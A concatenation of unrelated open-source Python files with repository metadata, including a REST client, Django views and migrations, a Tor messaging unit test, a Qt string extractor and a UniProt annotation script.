ts3o.base_path = os.path.abspath(os.path.dirname(__file__))
def _run():
try:
_setup()
Dispatcher().dispatch()
except ShutDownException as e:
logging.info('Good Bye!')
except CriticalException as e:
if ts3o.args.verbose:
print_traceback()
logging.critical('{}: {}'.format(e.__class__.__name__, str(e)))
except Exception as e:
print_traceback()
logging.critical('{}: {}'.format(e.__class__.__name__, str(e)))
print_buginfo()
if __name__ == '__main__':
_run()
else:
raise Exception('Please, run this script directly!')
| HWDexperte/ts3observer | ts3observer.py | Python | mit | 2,869 | 0.004183 |
import logging
import requests
from fakturo.core import exceptions, utils
LOG = logging.getLogger(__name__)
class BaseClient(object):
def __init__(self, url=None):
        url = url.rstrip('/')
self.url = url
self.requests = self.get_requests()
    def get_requests(self, headers=None, args_hooks=[], pre_request_hooks=[]):
        # Copy the headers so a shared or caller-owned dict is never mutated
        headers = dict(headers or {})
        if 'Content-Type' not in headers:
            headers['Content-Type'] = 'application/json'
pre_request_hooks = pre_request_hooks + [utils.log_request]
session = requests.Session()
session.hooks = dict(
args=args_hooks,
pre_request=pre_request_hooks)
session.headers.update(headers)
return session
def wrap_api_call(self, function, path, status_code=200, *args, **kw):
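        """Join path onto the base URL, invoke the given requests function (or a
        caller-supplied wrapper), and raise RemoteError if the response status
        code is not the expected one."""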
path = path.lstrip('/') if path else ''
url = self.url + '/' + path
LOG.debug('Wrapping request to %s' % url)
wrapper = kw.get('wrapper', None)
# NOTE: If we're passed a wrapper function by the caller, pass the
# requests function to it along with path and other args...
if wrapper and hasattr(wrapper, '__call__'):
return wrapper(function, url, *args, **kw)
response = function(url, *args, **kw)
# NOTE: Make a function that can extract errors based on content type?
if response.status_code != status_code:
error = None
if response.json:
error = response.json.get('error', None)
if not error:
error = 'Remote error occured. Response Body:\n%s' % \
response.content
raise exceptions.RemoteError(response.status_code, error)
return response
def get(self, *args, **kw):
return self.wrap_api_call(self.requests.get, *args, **kw)
def post(self, *args, **kw):
return self.wrap_api_call(self.requests.post, *args, **kw)
def put(self, *args, **kw):
return self.wrap_api_call(self.requests.put, *args, **kw)
def delete(self, *args, **kw):
return self.wrap_api_call(self.requests.delete, *args, **kw)
| billingstack/python-fakturo | fakturo/core/client.py | Python | apache-2.0 | 2,138 | 0.000468 |
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.utils.modules import try_import
from .forms import LocationForm
from .models import Location
def get_model(name):
"""
"""
for type in Location.subclasses():
if type._meta.module_name == name:
return type
raise StandardError("There is no Location subclass named '%s'" % name)
def form_for_model(model):
"""
Return the Form which should be used to add/edit ``model`` in the
WebUI, by importing the class named ``"%sForm" % model.__name__``
from the sibling ``forms`` module. For example::
        app1.models.Alpha      -> app1.forms.AlphaForm
app2.models.beta.Beta -> app2.forms.beta.BetaForm
If no such form is defined, an appropriately-patched copy of the
rapidsms.contrib.locations.forms.LocationForm form is returned.
"""
parts = model.__module__.split(".")
parts[parts.index("models")] = "forms"
module_name = ".".join(parts)
form_name = model.__name__ + "Form"
module = try_import(module_name)
if module is not None:
form = getattr(module, form_name, None)
if form is not None:
return form
meta_dict = LocationForm.Meta.__dict__
meta_dict["model"] = model
return type(
form_name,
(LocationForm,), {
"Meta": type("Meta", (), meta_dict)
}
)
| caktus/rapidsms | rapidsms/contrib/locations/utils.py | Python | bsd-3-clause | 1,402 | 0 |
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_noop
from corehq import toggles
from corehq.apps.domain.views import DomainViewMixin, LoginAndDomainMixin
from corehq.apps.hqwebapp.views import BasePageView
from corehq.apps.style.decorators import preview_boostrap3
@toggles.DASHBOARD_PREVIEW.required_decorator()
def dashboard_default(request, domain):
return HttpResponseRedirect(reverse(NewUserDashboardView.urlname,
args=[domain]))
class BaseDashboardView(LoginAndDomainMixin, BasePageView, DomainViewMixin):
@method_decorator(preview_boostrap3())
@method_decorator(toggles.DASHBOARD_PREVIEW.required_decorator())
def dispatch(self, request, *args, **kwargs):
return super(BaseDashboardView, self).dispatch(request, *args, **kwargs)
@property
def main_context(self):
context = super(BaseDashboardView, self).main_context
context.update({
'domain': self.domain,
})
return context
@property
def page_url(self):
return reverse(self.urlname, args=[self.domain])
class NewUserDashboardView(BaseDashboardView):
urlname = 'dashboard_new_user'
page_title = ugettext_noop("HQ Dashboard")
template_name = 'dashboard/dashboard_new_user.html'
@property
def page_context(self):
return {
}
| SEL-Columbia/commcare-hq | corehq/apps/dashboard/views.py | Python | bsd-3-clause | 1,502 | 0.001997 |
'''Module for testing the tor client'''
import unittest
import os
import time
import socks
from murmeli import system
from murmeli.torclient import TorClient
from murmeli.message import ContactRequestMessage
class FakeMessageHandler(system.Component):
'''Handler for receiving messages from Tor'''
def __init__(self, sys):
system.Component.__init__(self, sys, system.System.COMPNAME_MSG_HANDLER)
self.messages = []
def receive(self, msg):
'''Receive an incoming message'''
if msg:
self.messages.append(msg)
class TorTest(unittest.TestCase):
'''Tests for the tor communication'''
def test_sending(self):
'''Test sending non-valid and valid data to the listener'''
sys = system.System()
tordir = os.path.join("test", "outputdata", "tor")
os.makedirs(tordir, exist_ok=True)
tor_client = TorClient(sys, tordir)
sys.add_component(tor_client)
self.assertTrue(tor_client.started, "Tor started")
time.sleep(5)
# invalid data
torid = tor_client.get_own_torid()
print("Torid:", torid)
self.assertTrue(torid, "Tor id obtained")
# Send a message
success = self.send_message(torid, "abcdef".encode("utf-8"))
self.assertTrue(self.send_message(torid, "murmeli".encode("utf-8")), "Magic sent")
time.sleep(5)
# Add receiver to handle the messages
receiver = FakeMessageHandler(sys)
sys.add_component(receiver)
self.assertFalse(receiver.messages, "no messages received yet")
# contact request
req = ContactRequestMessage()
sender_name = "Worzel Gummidge"
sender_msg = "Watch out for the volcano, it's radioactive!"
req.set_field(req.FIELD_SENDER_NAME, sender_name)
req.set_field(req.FIELD_MESSAGE, sender_msg)
unenc_output = req.create_output(encrypter=None)
torid = tor_client.get_own_torid()
self.assertTrue(self.send_message(torid, unenc_output), "Real message sent")
time.sleep(5)
# Now check it has been received
self.assertEqual(len(receiver.messages), 1, "1 message received")
received = receiver.messages.pop()
print("Got message:", received)
self.assertEqual(received.get_field(req.FIELD_SENDER_NAME), sender_name, "name match")
self.assertEqual(received.get_field(req.FIELD_MESSAGE), sender_msg, "msg match")
# Finished
sys.stop()
self.assertFalse(tor_client.started, "Tor stopped")
time.sleep(5)
def send_message(self, recipient, message):
'''Send a message to the given recipient'''
# Try a few times because the service might take a few seconds to become available
for _ in range(10):
try:
socket = socks.socksocket()
socket.setproxy(socks.PROXY_TYPE_SOCKS4, "localhost", 11109)
socket.connect((recipient + ".onion", 11009))
numsent = socket.send(message)
socket.close()
return numsent == len(message)
except Exception as e:
print("Woah, that threw something:", e)
time.sleep(8)
if __name__ == "__main__":
unittest.main()
| activityworkshop/Murmeli | test/test_torclient.py | Python | gpl-2.0 | 3,296 | 0.002124 |
"""
MIT License
Copyright (c) 2018 Claude SIMON (https://q37.info/s/rmnmqd49)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
class XML:
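    """Serializes an XML tree description as single-character opcodes followed by
    NUL-terminated strings, in the format consumed by the XDHq wrapper."""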
def _write(self,value):
self._xml += str(value) + "\0"
def __init__(self,rootTag):
self._xml = ""
self._write("dummy")
self._write(rootTag)
def push_tag(self,tag):
self._xml += ">"
self._write(tag)
pushTag = push_tag
def pop_tag(self):
self._xml += "<"
popTag = pop_tag
def put_attribute(self,name,value):
self._xml += "A"
self._write(name)
self._write(str(value))
putAttribute = put_attribute
def put_value(self,value):
self._xml += "V"
self._write(str(value))
putValue = put_value
def put_tag_and_value(self,tag,value):
self.pushTag(tag)
self.putValue(value)
self.popTag()
putTagAndValue = put_tag_and_value
def to_string(self):
return self._xml
toString = to_string
| epeios-q37/epeios | tools/xdhq/wrappers/PYH/XDHqXML.py | Python | agpl-3.0 | 1,921 | 0.023425 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-23 02:11
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('slug', models.SlugField(unique=True)),
('note', models.TextField()),
('favorited', models.BooleanField(default=False)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notes', to=settings.AUTH_USER_MODEL)),
],
),
]
| chronossc/notes-app | notes/migrations/0001_initial.py | Python | mit | 993 | 0.002014 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Jakob Luettgau
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
class FileManager(object):
"""Manages the files that exist in the system."""
def __init__(self, simulation=None):
print('FileManager instance.')
self.simulation = simulation
self.files = {}
pass
    def lookup(self, name):
        """Return the entry for name if the file exists, otherwise False."""
        if name in self.files:
            return self.files[name]
        else:
            return False
    def scan(self, entry):
        """Scan the data structure for an entry."""
        pass
    def update(self, name, tape=None, size=None, pos=0):
        """Create or update the entry for a file and return it."""
        # create entry if not existent
        if name not in self.files:
            self.files[name] = {}
        # set fields individually
        if tape is not None:
            self.files[name]['tape'] = tape
        if size is not None:
            self.files[name]['size'] = size
        self.files[name]['pos'] = pos
        return self.files[name]
def dump(self):
"""Make snapshot of the file system state."""
print("")
self.simulation.log("Dump " + str(self) + " state.")
for i, item in enumerate(self.files):
self.simulation.log("%05d" % i, str(item), str(self.files[item]))
self.simulation.log(self.simulation.persistency.path)
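# Minimal usage sketch (standalone; names and values are illustrative):
#   fm = FileManager()
#   fm.update('file001', tape='T00001', size=4096)
#   fm.lookup('file001')   # -> {'tape': 'T00001', 'size': 4096, 'pos': 0}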
| jakobluettgau/feo | tapesim/components/FileManager.py | Python | gpl-3.0 | 2,010 | 0.004478 |
#!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/yescoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
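# Illustrative fragment of the xgettext 'po' output that parse_po() consumes (strings made up):
#   msgid "Options:"
#   msgstr ""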
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *yescoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("yescoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
| thormuller/yescoin2 | share/qt/extract_strings_qt.py | Python | mit | 1,873 | 0.005873 |
#!/usr/bin/env python
import urllib
import sys
import os
##### totalannotation.py by DJ Barshis
##### This script takes an input fasta file of sequence names and sequences, plus blast results files from blasts against
##### nr (parsed .txt with 1 hit per line) and the swissprot and TrEMBL (in -outfmt 7) uniprot databases.
##### It downloads the corresponding uniprot flat files from the www.uniprot.org web server,
##### extracts particular annotation information from the nr blast and each uniprot flat file, and combines it into a meta-annotation table.
##### You will need to create a 2-line .txt file: the first line holds the names of the particular columns you would like to extract from the
##### parsed nr blast file, separated by tabs (these files can be large, so I suggest extracting the header using head or less in terminal).
##### The second line consists of the "bad words" you want to skip over in your nr results, separated by tabs.
##### I usually use "predicted PREDICTED hypothetical unknown" or some combination thereof.
# usage is totalannotation.py YOUR_contigs.fasta BLASTx2nr.txt nrcolumnheadersandbadwords.txt BLASTx2Sprot.txt BLASTx2TrEMBL.txt evaluethreshold directoryforflatfiles(no slashes) outtablename.txt
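# A hypothetical example of the 2-line nrcolumnheadersandbadwords.txt file (fields separated by
# literal tabs, shown here as <tab>; the column names on the first line are placeholders and must
# match the header of your parsed nr blast file):
#   hitDescription<tab>hitEvalue
#   predicted<tab>PREDICTED<tab>hypothetical<tab>unknown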
#this is for setting how the script sorts your contigs into order
#change the word to 'text' for a text-based sorting or 'coral' for a
#palumbi-lab coral-specific numerical sorting
textorcoralsort = 'text'
#innames, inseqs read_fasta_lists(sys.argv[1])
#sys.argv[2] = BLASTx2nr.txt
#sys.argv[3] = thingsfornr.txt
#uniprotIDs read_uniprot(sys.argv[4], sys.argv[5])
evalue=float(sys.argv[6])
directory=sys.argv[7] #name only, no /'s
#o=open(str(sys.argv[8]), 'w') # New data table file name
#####This reads in a fasta file and builds a dictionary with the sequence names as keys and each sequence's length (as a string) as the value
def read_fasta_dict(file):
fin = open(file, 'r')
filelines=fin.readlines()
filelines.append('EOF')
count=0
names={}
seqs=[]
numseqs=0
for line in filelines:
if line=='EOF':
names[cols[0]]='%i' %(len(seq))
line=line.strip()
if line and line[0] == '>': #indicates the name of the sequence
if count>=1:
names[cols[0]]='%i' %(len(seq))
count+=1
line=line[1:]
cols=line.split(' ')
seq=''
else: seq +=line
fin.close()
return names
innames=read_fasta_dict(sys.argv[1])
print 'Read in fasta of %i sequences: ...' %(len(innames.keys()))
####This function reads in a parsed (every hit on one line) nr blast file and extracts certain columns and returns a dictionary
def nr_dict(file, colstoextract):
fin = open(file, 'r') # open input file
cols2extract = open(colstoextract, 'r')
d={}
headers=[]
contig=''
linenum=0
goodnrhits=0
for line in fin:
linenum+=1
line=line.rstrip()
cols=line.split('\t')
if linenum == 1:
headers=line #Used to copy header to new files
# this loop is for extracting the column indexes for the column names specified on the first line of the stufffornr.txt file
extractlinecount=0
for aline in cols2extract:
extractlinecount+=1
if extractlinecount==1:
aline=aline.rstrip()
words=aline.split('\t')
hitdescription=cols.index(words[0])
nrEval=cols.index(words[1])
if linenum >1:
cols[0]=cols[0].split(' ')[0]
if cols[0] == contig:
# print line
d[cols[0]].append('%s\t%s' %(cols[hitdescription],cols[nrEval]))
else:
if float(cols[nrEval]) <= evalue:
goodnrhits+=1
contig = cols[0]
numhit = 1
d[cols[0]]=d.get(cols[0],[])
d[cols[0]].append('%s\t%s' %(cols[hitdescription],cols[nrEval]))
fin.close()
cols2extract.close()
return headers, d, goodnrhits
headers, d, goodnrhits=nr_dict(sys.argv[2], sys.argv[3])
print "Read in nr blast..."
print '%s%i' %('Number of good nr matches: ',goodnrhits)
print '%s%i' %('Number not matched in nr: ',len(innames.keys())-goodnrhits)
print "Searching for badwords..."
######This function parses the nr dictionary for hits that do not contain badwords (e.g. 'Predicted', 'hypothetical', etc.)
def parse_badwords(value, badwords):
onlybad=0
madegood=0
badhits=[]
goodhits=[]
tophit=value[0]
for each in value:
numbadhits=0
for item in badwords:
if item in each:
numbadhits+=1
if numbadhits >=1:
badhits.append(each)
if numbadhits == 0:
goodhits.append(each)
if len(goodhits)==0:
onlybad +=1
if len(goodhits)>=1:
madegood +=1
goodhits+=badhits
return tophit, goodhits, onlybad, madegood
badwordlist=[]
#reading in a list of badwords from stufffornr.txt
badwordfile=open(sys.argv[3],'r')
badwordline=0
for line in badwordfile:
badwordline+=1
if badwordline==2:
line=line.rstrip()
badwordlist=line.split('\t')
onlybadnrs=0
madegoodnrs=0
####this step loops through the entries in your contig dictionary
####and calls the badword parser for each entry that has a match in the nr dictionary, which returns the top hit and the top non-badword hit (if there is one)
for key,value in innames.items():
if d.has_key(key):
tophit, goodhits, onlybad, madegood= parse_badwords(d[key], badwordlist)
innames[key]='%s\t%s\t%s' %(innames[key],tophit, goodhits[0])
onlybadnrs+=onlybad
madegoodnrs+=madegood
else:
innames[key]+='\t%s\t%s\t%s\t%s' %('No_sig_nr_hit','No_sig_nr_hit','No_sig_nr_hit','No_sig_nr_hit')
print '%s%i' %('Number of nr hits with only a bad word hit: ', onlybadnrs)
print '%s%i' %('Number of nr hits with a good word hit: ', madegoodnrs)
#######This function reads in the swissprot and trembl outputs and returns
#######a dictionary that contains the top uniprot ID from swissprot (if available) or trembl (if no swissprot match was found)
def read_uniprot(sprotfile,tremblfile):
queryname=''
uniprotIDs={}
uniqueprotIDs={}
sprotmatch=0
tremblpeats=0
tremblmatch=0
sprot = open(sprotfile,'r')
trembl = open(tremblfile,'r')
for line in sprot:
line=line.rstrip()
if line[0] == '#':
continue
else:
cols=line.split('\t')
if cols[0] == queryname:
continue
else:
# if float(cols[10]) <= evalue and cols[1].split('|')[2].split('_')[1] != 'NEMVE': #for parsing based on threshold value and excluding hits to Nematostella
if float(cols[10]) <= evalue: #for parsing based on threshold value only
ID=cols[1].split('|')
uniprotIDs[cols[0]]=uniprotIDs.get(cols[0],[])
uniprotIDs[cols[0]].append(ID[1])
if innames.has_key(cols[0]):
sprotmatch+=1
innames[cols[0]]+='\t%s\t%s\t%s' %(ID[1],cols[2],cols[10])
queryname=cols[0]
if uniqueprotIDs.has_key(ID[1]):
continue
else:
uniqueprotIDs[uniprotIDs[cols[0]][0]]=''
print 'Read in swissprot blast ...'
print '%s%i' %('Number of good swissprot matches: ', sprotmatch)
for line in trembl:
line=line.rstrip()
if line[0] == '#':
continue
else:
cols=line.split('\t')
if cols[0] == queryname:
continue
else:
# if float(cols[10]) <= evalue and cols[1].split('|')[2].split('_')[1] != 'NEMVE': #for parsing based on threshold value
if float(cols[10]) <= evalue: #for parsing based on threshold value
ID=cols[1].split('|')
if uniprotIDs.has_key(cols[0]):
uniprotIDs[cols[0]].append(ID[1])
queryname=cols[0]
tremblpeats+=1
else:
uniprotIDs[cols[0]]=uniprotIDs.get(cols[0],[])
uniprotIDs[cols[0]].append(ID[1])
if innames.has_key(cols[0]):
innames[cols[0]]+='\t%s\t%s\t%s' %(ID[1],cols[2],cols[10])
queryname=cols[0]
tremblmatch+=1
if uniqueprotIDs.has_key(uniprotIDs[cols[0]][0]):
continue
else:
uniqueprotIDs[uniprotIDs[cols[0]][0]]=''
print 'Read in TrEMBL blast ...'
print '%s%i'%('Number of repeat matches from TrEMBL: ', tremblpeats)
print '%s%i'%('Number of additional good matches from TrEMBL: ', tremblmatch)
print '%s%i' %('flatfilesneeded: ',len(uniqueprotIDs.keys()))
return uniprotIDs, uniqueprotIDs
#this line calls the uniprot reading function
uniprotIDs, uniquesforflats=read_uniprot(sys.argv[4], sys.argv[5])
print 'downloading flat files ...'
#this loop downloads all the uniprot flat files for the list of unique uniprotIDs that was parsed from the blast results
for key, value in uniquesforflats.items():
if os.path.exists('./'+directory+'/'+key+'.txt'): #thanks JTL for this addition!
continue
else:
urllib.urlretrieve('http://www.uniprot.org/uniprot/'+key+'.txt', './'+directory+'/'+key+'.txt')
print 'extracting relevant info from flat files ...'
print 'don\'t worry, this takes a while ...'
########this function extracts the relevant information from each individual flat file
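######## Illustrative (hypothetical) examples of some uniprot flat-file record types handled below:
########   DE   RecName: Full=Heat shock cognate 71 kDa protein;
########   DR   KEGG; hsa:3312; -.
########   DR   GO; GO:0005524; F:ATP binding; IEA:UniProtKB-KW.
########   KW   ATP-binding; Chaperone; Cytoplasm;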
def extractGO(contigname):
if uniprotIDs.has_key(contigname):
flatfile = open('./'+directory+'/'+uniprotIDs[contigname][0]+'.txt','r')
ID='No_ID'
DE='No_description'
description=0
KEGG='No_KEGG'
KEGGKO='No_KEGGKO'
flatfiledict={}
GOcodes=''
GOBP=''
GOMF=''
GOCC=''
keywords=''
for line in flatfile:
line=line.rstrip()
if line[0:2] == 'ID':
line=line.split(' ')
ID=line[3]
if line[0:2] == 'DE' and description == 0:
line=line.split('=')
DE=line[1][:-1]
description +=1
if line[0:2] == 'DR':
if line[5:9] == 'KEGG':
line=line.split(';')
KEGG=line[1].strip()
if line[5:7] == 'KO':
line=line.split(';')
KEGGKO=line[1].strip()
if line[5:7] == 'GO':
line=line.split(';')
if GOcodes == '':
GOcodes+='%s' %(line[1].strip())
else:
GOcodes+=' // %s' %(line[1].strip())
if line[2].strip().split(':')[0] == 'C':
GOCC+='%s (%s);' %(line[2].strip().split(':')[1], line[1].strip())
if line[2].strip().split(':')[0] == 'P':
GOBP+='%s (%s);' %(line[2].strip().split(':')[1], line[1].strip())
if line[2].strip().split(':')[0] == 'F':
GOMF+='%s (%s);' %(line[2].strip().split(':')[1], line[1].strip())
if line[0:2] == 'KW':
line=line[2:].split(';')
for item in line:
if item == '':
continue
else:
keywords+='%s;' %(item.strip())
if GOcodes=='':
GOcodes='No_GOcodes'
if GOBP=='':
GOBP='No_GOBP'
if GOMF=='':
GOMF='No_GOMF'
if GOCC=='':
GOCC='No_GOCC'
if keywords=='':
keywords='No_keywords'
outstring='\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' %(ID, DE, KEGG, KEGGKO, GOcodes, GOBP, GOMF, GOCC, keywords)
nomatch=0
else:
nomatch=1
outstring='\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' %('No_Uniprotmatch','No_%_identity','No_evalue','No_ID','No_Description','No_KEGG', 'No_KEGGKO','No_GO','No_GOCC','No_GOBP','No_GOMF','No_keywords')
return outstring, nomatch
notmatched=0
extractingcounter=0
#####This loop calls the extraction function for every contig; flat-file info is appended when a uniprot match exists
for key, value in innames.items():
extractingcounter+=1
outstring, nomatch = extractGO(key)
innames[key]+=outstring
notmatched+=nomatch
o=open(str(sys.argv[8]), 'w') # New data table file name
o.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n' %('ContigName', 'ContigLength', 'topnrMatch','topnrEvalue', 'nobadwordnrMatch', 'nobadwordnrEvalue','Uniprotmatch','%_identity','evalue','ID','Description','KEGG', 'KEGGKO','GO','GOCC','GOBP','GOMF','Keywords')) #used if you want a specific header and filename for each file
print '%s%i' %('Contigs with no uniprot match: ', notmatched)
print 'compiling extracted information ...'
############this is for sorting your contigs based on text order#############
if textorcoralsort == 'text':
l=[]
for key,value in innames.items():
l.append((key,value))
l.sort()
for item in l:
o.write('%s\t%s\n' % (item[0], item[1])) #writes each line of the tuple as separate tab delimited text
o.close()
#############this is for sorting your contigs based on our coral specific contig names##############
if textorcoralsort == 'coral':
l=[]
joinedcontigcounter=600247
for key,value in innames.items():
name=key.split(' ')
if name[0][0:6]=='contig':
newname=name[0].split('_')
if len(newname)==1:
num=int(newname[0][6:])
if len(newname)>1:
joinedcontigcounter+=1
num=joinedcontigcounter
if name[0][0:6]=='c_sym_':
newname=name[0].split('_')
num=700000+int(newname[2])
if name[0][0:6]=='d_sym_':
newname=name[0].split('_')
num=900000+int(newname[2])
l.append((num,key,value))
l.sort()
for item in l:
# print item
o.write('%s\t%s\n' % (item[1], item[2])) #writes each line of the tuple as separate tab delimited text
o.close()
| cuttlefishh/papers | vibrio-fischeri-transcriptomics/code/python/totalannotation_v1-1.py | Python | mit | 12,403 | 0.048859 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-07-03 08:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organization_projects', '0087_auto_20190619_2052'),
]
operations = [
migrations.AlterModelOptions(
name='project',
options={'ordering': ['title'], 'permissions': (('user_add', 'Mezzo - User - User can add its own content'), ('user_edit', 'Mezzo - User - User can edit its own content'), ('user_delete', 'Mezzo - User - User can delete its own content'), ('team_add', 'Mezzo - User - Team can add its own content'), ('team_edit', "Mezzo - Team - User can edit his team's content"), ('team_delete', "Mezzo - Team - User can delete his team's content")), 'verbose_name': 'project', 'verbose_name_plural': 'projects'},
),
migrations.AlterModelOptions(
name='projectpage',
options={'permissions': (('user_add', 'Mezzo - User - User can add its own content'), ('user_edit', 'Mezzo - User - User can edit its own content'), ('user_delete', 'Mezzo - User - User can delete its own content'), ('team_add', 'Mezzo - User - Team can add its own content'), ('team_edit', "Mezzo - Team - User can edit his team's content"), ('team_delete', "Mezzo - Team - User can delete his team's content"))},
),
]
| Ircam-Web/mezzanine-organization | organization/projects/migrations/0088_auto_20190703_1035.py | Python | agpl-3.0 | 1,401 | 0.001428 |